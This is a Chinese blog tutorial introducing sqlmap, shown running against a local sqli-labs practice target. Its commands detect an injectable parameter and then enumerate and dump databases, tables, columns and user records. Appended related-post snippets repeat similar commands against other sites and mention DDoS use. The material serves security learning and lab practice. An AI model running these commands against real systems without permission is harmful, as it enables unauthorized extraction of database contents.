sqlmap入门使用教程

已于 2022-02-23 10:58:36 修改
阅读量1.5k 收藏 4
点赞数 4
文章标签: sql 数据库
于 2022-02-21 17:11:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/talentac/article/details/123050653
版权

Sqlmap

https://sqlmap.org/

sqlmap是一个开源,跨平台的自动化SQL注入工具,目前支持大多数主流数据库有MySQL,Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite等

sqlmap的强大的功能包括 数据库指纹识别、数据库枚举、数据提取、访问目标文件系统,并在获取完全的操作权限时执行任意命令。

我们可以使用 -h参数来查看 sqlmap 的可选参数以及用法,sqlmap -h

-hh 参数可以查看更详细的用法,sqlmap -hh

image-20220221155316806

小试牛刀

靶场:这里我们使用搭建的 sqli-labs(https://github.com/Audi-1/sqli-labs/wiki)来进行测试

步骤

  1. 查看是否能注入

-u, --url表示指定url

sqlmap -u "http://127.0.0.1/Less-1/?id=1"
sqlmap -u "http://127.0.0.1/Less-1/?id=1" -p id # 可以指定注入参数

image-20220221162117428

Parameter表示注入参数为id,Get表示为Get请求,Type表示支持的注入类型

  1. 查看所有数据库

--dbs表示枚举所有数据库

sqlmap -u "http://127.0.0.1/Less-1/?id=1" --dbs

image-20220221162253249

  1. 查看指定数据库所有表

-D 表示指定数据库 --tables 表示枚举所有表

sqlmap -u "http://127.0.0.1/Less-1/?id=1" -D security --tables

image-20220221163027568

  1. 查看指定数据表的所有列

-T表示指定表 --columns表示枚举所有列名与数据类型

sqlmap -u "http://127.0.0.1/Less-1/?id=1" -D security -T users --columns

image-20220221163118822

  1. 查看指定数据表指定列的内容

-C 表示指定列 --dump 表示输出数据 --start表示开始位置 --stop表示停止位置

sqlmap -u "http://127.0.0.1/Less-1/?id=1" -D security -T users -C id,username --dump --start 1 --stop 5

image-20220221163609573

TalentAC
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
sqlmap使用方法
08-26
sqlmap -p 指定测试参数 -b 获取banner --dbs 列举数据库 --is-dba 是否是管理员权限 --current-db 当前数据库 --current-user 当前用户 --tables 列举数据库的表名 --count 检索所有条目数 --columns 获取表的列名 --dump 获取表中的数据,包含列 --dump-all 转存DBMS数据库所有表项目 --level 测试等级(1-5),默认为1 -v 显示详细信息 读取数据库--->读取表---->读取表的列---->获取内容
Sqlmap的使用方法
w1304099880的博客
10-26 1223
sqlmap是一个非常强大的sql注入检测与辅助工具,但是由于没有图形界面,基本上用起来比较麻烦。我们要了解这些语句。如下: 检查注入点: sqlmap-uhttp://ooxx.com.tw/star_photo.php?artist_id=11 爆所有数据库信息: sqlmap-uhttp://ooxx.com.tw/star_photo.php?artist_id=11--...
SQLmap使用教程图文教程(超详细)
最新发布
2401_84969692的博客
05-13 1356
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
sqlmap的简要使用方法
weixin_34004750的博客
07-08 191
仅作为备忘!!! sqlmap使用: 注入类型有四种分别为:boolean-based blind、error-based、stacked queries、inline query。 sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' #-u 注入点   检测注入点是否可用s...
sqlmap简单入门攻略
MSLD_PPT的博客
10-17 1051
sqlmap依托于python,首先下载python 和 sqlmap 下载地址 python 安装一步步默认即可,安装完后将sqlmap 放入python根目录下 这还没结束,然后桌面新建快捷方式 然后找到新建的快捷方式,右键属性修改起始位置为你的sqlmap的地址 之后就可已正常使用sqlmapSQLMAP用于mysql中DDOS攻击 1.sqlmap.py -u [url]htt...
ibatis-sqlMap-入门教程(代码)
10-22
【标题】"ibatis-sqlMap-入门教程(代码)" 涉及的知识点主要集中在使用MyBatis(原iBATIS)框架进行数据库操作的初步实践上。MyBatis是一个优秀的持久层框架,它支持定制化SQL、存储过程以及高级映射,避免了几乎...
渗透测试工具sqlmap基础教程.docx
10-25
本文旨在帮助渗透测试的小白入门,介绍sqlmap的基本使用方法。 一、检测注入点是否可用 sqlmap提供了多种检测注入点的方式,可以根据不同的情况选择合适的检测方法。例如,我们可以使用以下命令检测注入点: `...
sqlmap手册-中文版.pdf
07-30
sqlmap
sqlmap.pdf
07-16
以下是从给定文件中摘取的一个实际使用案例,展示了如何使用SQLMap对一个Web应用进行渗透测试,并从中获取敏感信息。 ##### 1. 环境配置 - **测试环境**:BackTrack5(Linux发行版)/ SQLMap版本0.9 - **目标URL**...
iBATIS 入门教程
08-18
- `SqlMapConfig.xml` 中的 `<sqlMap>` 标签用于引入各个持久化类的 XML 配置文件。 - 缓存模型(Cache)在 XML 配置中可进行设置,以提高性能。类型包括 `MEMORY`(STRONG, SOFT, WEAK),其中: - STRONG:强...
sqlmap操作指南
06-02
sql操纵指南sql操纵指南sql操纵指南sql操纵指南sql操纵指南sql操纵指南sql操纵指南sql操纵指南
sqlmap 新手入门
ynm0000的博客
06-16 331
1:扫描目标站点 python sqlmap.py -u "url" 例子:python sqlmap.py -u "http://textphp.vulnweb.com/artists.php?artist=1" 2:查看他的所有用户名:python sqlmap.py -u "http://textphp.vulnweb.com/artists.php?artist=1" --users ...
SQLMAP的使用
m0_58001548的博客
04-03 3852
SQLmap 是一款用来检测与利用 SQL 注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。官方网站下载 http://sqlmap.org/
sqlmap基本使用方法
zjc的专栏
05-16 4560
sqlmap是安全测试工具,通常用于对已知的http接口进行sql注入测试,一旦注入成功,可以获取到后台包括数据库表、用户信息、数据内容等多种敏感信息,对web漏洞防范有重要意义。 基本语法 1.先进行注入点探测,常规语法是: python sqlmap.py –u [url] 说明:url 一般选择包括参数输入的链接。如果是get方法,就直接跟在url后面用?补充参数。如果是...
Sqlmap 使用方法小结
热门推荐
0verWatch的博客
08-02 2万+
平常的使用GET方法像–tables –columns -T -D –dbs –dump 啥的就不说了,只是博客几天不发,空着不好,还是得写写东西 --is-dba 当前用户权限(是否为root权限,mssql下最高权限为sa) --dbs 所有数据库 --current-db 网站当前数据库 --users 所有数据库用户 --current-user 当前数据库用户 --random-age...
SQL注入】Sqlmap使用指南(手把手保姆版)持续更新
开水的博客
03-15 2万+
sqlmap 是一款开源的渗透测试工具,可以自动化进行SQL注入的检测、利用,并能接管数据库服务器。它具有功能强大的检测引擎,为渗透测试人员提供了许多专业的功能并且可以进行组合,其中包括数据库指纹识别、数据读取和访问底层文件系统,甚至可以通过带外数据连接的方式执行系统命令。python sqlmap.py -参数,sqlmap可以运行在python2.6、2.7和3.x的任何平台上。
sqlmap入门
奇葩
09-19 365
sqlmap支持的注入方式 基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 联合查询注入,可以使用union的情况下的注入。 堆查询注入,可以同时执行多条语句的执行时的注入。 sqlmap...
Sqlmap使用指南(一)
Yale的博客
03-04 1268
最近接触sqlmap指南比较多,有时候由于不熟练常会忘记些命令,所以在此根据乌云知识库等来源进行归纳总结,详细介绍sqlmap。(本系列文章适合新手)要了解SQLMap的扫描规则,也就是Payload,那麽到底Payload是哪里来,是根据什么逻辑生成的呢,接下来必须先了解几个文件的,SQLMap的扫描规则文件位于\xml文件夹中,其中boundaries.xml与Payloads文件夹则为SQLM
sqlmap使用教程
09-13
关于sqlmap使用教程,以下是一些基本的指导步骤: 1. 安装sqlmap:你可以从sqlmap的官方网站(https://github.com/sqlmapproject/sqlmap)上下载最新版本的sqlmap。解压文件后,进入到sqlmap的目录。 2. 目标URL:确定你要测试的目标URL。这通常是一个包含参数的网页地址,它可能容易受到SQL注入攻击。 3. 检测漏洞:输入以下命令来检测目标URL是否存在SQL注入漏洞: ``` python sqlmap.py -u 目标URL ``` 4. 扫描选项:根据需要选择不同的扫描选项。例如,可以使用`--dbs`选项来获取目标数据库的名称,使用`--tables -D <数据库名>`选项来获取数据库中表的名称等等。 5. 数据库信息:使用`--current-db`选项来获取当前数据库的名称。使用`--users -D <数据库名>`选项来获取数据库中用户的信息。 6. 提取数据:使用`--dump -D <数据库名> -T <表名>`选项来提取指定数据库和表中的数据。你还可以使用其他选项来指定提取的列和过滤条件。 这只是一个简单的入门指南,sqlmap还有很多其他高级功能和选项。请记住,在进行任何安全测试之前,确保你已经获得相关授权,并且在合法和道德的框架内进行测试。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值